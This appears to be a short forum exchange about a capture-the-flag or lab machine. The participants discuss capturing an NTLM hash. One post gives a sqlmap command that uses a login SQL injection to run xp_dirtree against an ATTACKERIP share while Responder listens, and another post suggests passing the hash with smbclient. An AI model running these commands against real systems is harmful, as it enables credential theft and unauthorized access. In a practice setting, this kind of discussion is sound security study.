(June 4, 2022, 10:52 PM)karhu Wrote: (June 4, 2022, 10:00 PM)ryzen Wrote: I was able to get the users NTLM hash with responder and xp_dirtree, but hascat can't crack it
With the ntlm hash, you should be able to use smbclient with the --pw-nt-hash to pass the hash to WinNT and login. I can't seem to get the hashes in the first place. A nudge would def be appreciated.
Setup responder locally and run xp_dirtree command via sqlmap(using the login injection) and connect back to my system
sqlmap -r login.req --sql-query="exec master.dbo.xp_dirtree '\\\\ATTACKERIP\\share'"
EDIT: I don't think this is the route. The hash I got is a system account. Unlikely that it will be the way in.